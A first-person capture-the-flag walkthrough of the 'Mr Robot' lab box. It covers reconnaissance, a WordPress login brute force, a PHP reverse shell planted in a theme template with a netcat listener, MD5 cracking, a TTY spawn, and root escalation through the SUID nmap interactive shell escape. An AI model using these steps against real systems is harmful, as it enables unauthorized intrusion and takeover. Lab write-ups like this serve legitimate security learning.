So first of all I will find the ip address of the Mr Robot box using the arp-scan tool. Here I will enter the command arp -scan -l to find the ip address box. so here I have found the ip address box which is 192.168.201.132
After I find the ip address box I will do the enumeration using the nmap tool. so here we can see ssh port 22 is closed while port 80/443 is open, this shows that this box is running a website
so here I have opened the website from this box
after i tried a few times with several ways to find a hint but i didn't find anything
robots.txt hidden file
so after I tried many ways, I remembered if dealing with web based CTF is to check the robots.txt file.
so this is the first flag I've been looking for
then here also shows there is a file fsocity.dic in the form of a dictionary, this gives a sign that I need to do brute force in the next step
so here shows a dictionary file that has 80,000 words
so previously I have done vulnerability analysis using the gobuster tool. I found the wordpress path, so here it can be known that I am dealing with wordpress cms
after that I thought that the dictionary file should be used, so I did bruteforce to the wordpress login page, in this picture I took 40 minutes but in fact before that I took 4 hours to get the username and password
after getting the username and password, I logged in to see the content in the dashboard but there was nothing
so here I will do an exploit by inserting PHP Reverse Shell in the 404 template, Here I use a shell from https://github.com/pentestmonkey/php-reverse-shell
then open netcat to listen to the shell on port 1234 (default)
so here shows I'm still not a root user
when i go into the robot directory here i have found the second flag but it is not accessible because i am not the root user. but here I have found a password that is encrypted in the form of md5 hash
After that I use the online tool to decrypt the password
If you have a non-tty-shell, there are certain commands and things you can't do. This can happen if you upload a reverse shell on a web server, so that the shell you get is by www-user data, or similar. These users are not meant to have shells because they do not interact with the system as humans do.
So if you don't have a tty-shell you can't run su, sudo for example. This can be annoying if you manage to get the root password but you can’t use it. because I use non-tty-shell here I will enter a command like python -c 'import pty; pty.spawn ("/bin/sh") 'or echo os.system ('/bin/bash ') to spawn tty shell
after that I will try to access the root user by entering the password that was encrypted earlier and here shows I succeeded
Now I need to find the third and last key. So before I tried to enter the /root folder but access was denied. Then I decided to check out a program that has SUID bit, here I can see where nmap is as a SUID bit.
Nmap has SUID bit set. A lot of times administrators set the SUID bit to nmap so that it can be used to scan the network efficiently as all the nmap scanning techniques does not work if you don’t run it with root privilege.
However, there is a functionality in nmap older versions where you can run nmap in an interactive mode which allows you to escape to shell. If nmap has SUID bit set, it will run with root privilege and we can get access to ‘root’ shell through it’s interactive mode.
then I will execute nmap with interactive mode, don't forget to enter the "!sh" command to allow escape jail shells.
then I will go into the root directory where previously my access was denied because I am not a root user. but now I'm in root user where this is good because I can find the third flag.
so now I have found the third flag on the root directory, so here shows that I have successfully completed the task from this box
the following is a list of the three flags I got from this CTF box